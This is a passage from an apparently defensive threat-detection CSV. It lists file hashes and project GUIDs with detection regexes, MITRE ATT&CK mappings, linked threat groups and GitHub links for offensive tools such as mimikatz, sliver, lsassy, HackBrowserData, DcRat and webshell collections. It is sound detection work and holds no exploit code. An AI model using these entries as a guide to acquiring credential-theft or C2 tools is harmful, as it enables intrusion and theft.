COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","21494" "*0bc53792d88e1638eb0772b7b3bad8cf04d4bb68d958fea9ddac7df9a8d09b77*",".{0,1000}0bc53792d88e1638eb0772b7b3bad8cf04d4bb68d958fea9ddac7df9a8d09b77.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21495" "*0bcc96d2405f07c6ad41b4904c79008707584c523b20df5e2689d8fc25412029*",".{0,1000}0bcc96d2405f07c6ad41b4904c79008707584c523b20df5e2689d8fc25412029.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","21496" "*0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a*",".{0,1000}0bcce0874f30d8d38fabb4fcc1bb44fc60d811c7ff1ae3d3869601d44d65a80a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21497" "*0bd2acc669f0084786cd7df668e279e21e71556e9e927235a54f8bc6c1a27fa7*",".{0,1000}0bd2acc669f0084786cd7df668e279e21e71556e9e927235a54f8bc6c1a27fa7.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","21499" "*0BD5DE6B-8DA5-4CF1-AE53-A265010F52AA*",".{0,1000}0BD5DE6B\-8DA5\-4CF1\-AE53\-A265010F52AA.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21500" "*0bde1c200a95461bc8ae1bab8713ec0adb7c4c01616f37d7cfa395bfc94a0dd2*",".{0,1000}0bde1c200a95461bc8ae1bab8713ec0adb7c4c01616f37d7cfa395bfc94a0dd2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21501" 
"*0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21*",".{0,1000}0bdf933e7adf4960c337d0badbd044ccf14ab36731360c5c92001c9c5feded21.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21502" "*0be065c34cebd132ea23ef20d51f13c21ad31428db2342bcddc0b4e182625e5e*",".{0,1000}0be065c34cebd132ea23ef20d51f13c21ad31428db2342bcddc0b4e182625e5e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21503" "*0bed6254a9818d22f531a9433f9b20d31eefe0550ece4ba12f4e05e8db5c2cfb*",".{0,1000}0bed6254a9818d22f531a9433f9b20d31eefe0550ece4ba12f4e05e8db5c2cfb.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","21507" 
"*0bef08167ba7fbe62a07368279b1b6d8450cdb04696eb9abf18b02be519abd99*",".{0,1000}0bef08167ba7fbe62a07368279b1b6d8450cdb04696eb9abf18b02be519abd99.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","21508" "*0bef49d95cf04914b2824fe3957dc3b9f66447c150877254ddbbf36dd7b231b8*",".{0,1000}0bef49d95cf04914b2824fe3957dc3b9f66447c150877254ddbbf36dd7b231b8.{0,1000}","offensive_tool_keyword","SharpZeroLogon","exploit for CVE-2020-1472","T1210 - T1558.003 - T1078.002 - T1098 - T1003.006","TA0001 - TA0004 - TA0005 - TA0006 - TA0003","Ghost Ransomware","N/A","Exploitation tool","https://github.com/leitosama/SharpZeroLogon","1","0","#filehash","N/A","10","1","27","17","2021-02-13T10:13:32Z","2021-02-13T09:44:43Z","21509" "*0byt3m1n1-V2*",".{0,1000}0byt3m1n1\-V2.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","21512" "*0c021fa1272bc222489a6a54e46a10c85d57d758071b310afc66441f72d4a482*",".{0,1000}0c021fa1272bc222489a6a54e46a10c85d57d758071b310afc66441f72d4a482.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21513" 
"*0C117EE5-2A21-496D-AF31-8CC7F0CAAA86*",".{0,1000}0C117EE5\-2A21\-496D\-AF31\-8CC7F0CAAA86.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#GUIDProject","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","21514" "*0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194*",".{0,1000}0c19f220188feff67261fd9ac6448ee06b84b8e836f1e558592c2b381e671194.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21517" "*0c1bb8a937aea9a05ec6524c92bf16f3387a52b94ec2ece27e2d98e1ee9fa721*",".{0,1000}0c1bb8a937aea9a05ec6524c92bf16f3387a52b94ec2ece27e2d98e1ee9fa721.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21518" "*0c246202c0bc2e6db131df9e2bececcd1ed552a0d17dbb5da8552750d98bcdf1*",".{0,1000}0c246202c0bc2e6db131df9e2bececcd1ed552a0d17dbb5da8552750d98bcdf1.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder 
used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","21523" "*0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31*",".{0,1000}0c28929dbbc6cfe733ed93670025f18f03642a4b323d7fd123ae63c9366afc31.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","21524" "*0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36*",".{0,1000}0c2b8e134f235970726f41712824ce62f42635e4bd647dfcdb58c8fff88cff36.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21525" "*0c2bcf6e46488c60fbaf6ac42680e04d6b7dd461139acfd86b934cb6d43a7c33*",".{0,1000}0c2bcf6e46488c60fbaf6ac42680e04d6b7dd461139acfd86b934cb6d43a7c33.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21526" 
"*0c2c7f0208bac76684a0e8f5960772b22014f417a81caba157b0b512e13404b2*",".{0,1000}0c2c7f0208bac76684a0e8f5960772b22014f417a81caba157b0b512e13404b2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","21527" "*0c2ddbc7ae28df7912929d7523e0116c5ba39a00c842ce23876c3c1ad5490c43*",".{0,1000}0c2ddbc7ae28df7912929d7523e0116c5ba39a00c842ce23876c3c1ad5490c43.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","21528" "*0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc*",".{0,1000}0c3379e3cc4fab5cbf1ce0aff52559da191a2b97c6fa27d5122232649f78e7cc.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","21529" "*0c35e11198ce91ce473f38aa0d3d4ac7a6c7e1c50ef229f5f6019ad95846ea4c*",".{0,1000}0c35e11198ce91ce473f38aa0d3d4ac7a6c7e1c50ef229f5f6019ad95846ea4c.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","21530" "*0c38fc9f070a1db92c2007447a97b7777565ca630097ca73a1b3c9f649d7183e*",".{0,1000}0c38fc9f070a1db92c2007447a97b7777565ca630097ca73a1b3c9f649d7183e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21531" "*0C3EB2F7-92BA-4895-99FC-7098A16FFE8C*",".{0,1000}0C3EB2F7\-92BA\-4895\-99FC\-7098A16FFE8C.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#GUIDproject","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","21532" "*0c509e431004929c0aaa10ba671db16a8d02003ac17419fdc31687bf9747e4b6*",".{0,1000}0c509e431004929c0aaa10ba671db16a8d02003ac17419fdc31687bf9747e4b6.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","21534" "*0c5259c25ef3911a8936b0216cf77edb932743a82992d6f77e8e420795697fdd*",".{0,1000}0c5259c25ef3911a8936b0216cf77edb932743a82992d6f77e8e420795697fdd.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack 
surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21535" "*0c5c865669aa4b9ae6687ff50eb22888b0c3afcf6a7cfdfc63a2a2dea3c6d9f5*",".{0,1000}0c5c865669aa4b9ae6687ff50eb22888b0c3afcf6a7cfdfc63a2a2dea3c6d9f5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21536" "*0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6*",".{0,1000}0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21537" "*0c61a84a8b1d0ec97638505b72cd333f82840ffbe7f39c5ffae8efb31e45d0f1*",".{0,1000}0c61a84a8b1d0ec97638505b72cd333f82840ffbe7f39c5ffae8efb31e45d0f1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21538" "*0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f*",".{0,1000}0c64315cdf7bd0e51e76f04510c91d931b8b4de73f06ea7931666e62cb34739f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21539" "*0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b*",".{0,1000}0c649fe30b4986eff17b3913a02a89728126d530298659f1fe1ea07570428c2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21540" "*0c67fcccaa5ee7a7c0ff82a821e38543b219d7777a07f4394741f9d64f21bf45*",".{0,1000}0c67fcccaa5ee7a7c0ff82a821e38543b219d7777a07f4394741f9d64f21bf45.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","21543" 
"*0c79bc58224e71882e48b6230f3a90ec516f30ba8a6a431f7d2f6323de581a81*",".{0,1000}0c79bc58224e71882e48b6230f3a90ec516f30ba8a6a431f7d2f6323de581a81.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","21545" "*0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13*",".{0,1000}0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - 
T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21546" "*0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13*",".{0,1000}0c79c5147e4ff87b8b655873c328b10976a68e7226089c1a7ab09a6b74038b13.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt 
Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","21547" "*0c7db3f692255998b52505a79ab8323887da451368d02a2e9aa115ae48bd579e*",".{0,1000}0c7db3f692255998b52505a79ab8323887da451368d02a2e9aa115ae48bd579e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21549" "*0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1*",".{0,1000}0c7fdc11cd301457131335dc023726493d839cd18ab659c9ab3a53fbe24269c1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21550" "*0C81C7D4-736A-4876-A36E-15E5B2EF5117*",".{0,1000}0C81C7D4\-736A\-4876\-A36E\-15E5B2EF5117.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Meckazin/ChromeKatz","1","0","#GUIDproject","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","21552" "*0C89EC7D-AC60-4591-8F6B-CB5F20EC0D8D*",".{0,1000}0C89EC7D\-AC60\-4591\-8F6B\-CB5F20EC0D8D.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","21553" "*0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85*",".{0,1000}0c8e33156886e733d0021652fe0a13b03946fc09adb392458fb2a435fb402d85.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21554" "*0C8F49D8-BD68-420A-907D-031B83737C50*",".{0,1000}0C8F49D8\-BD68\-420A\-907D\-031B83737C50.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used 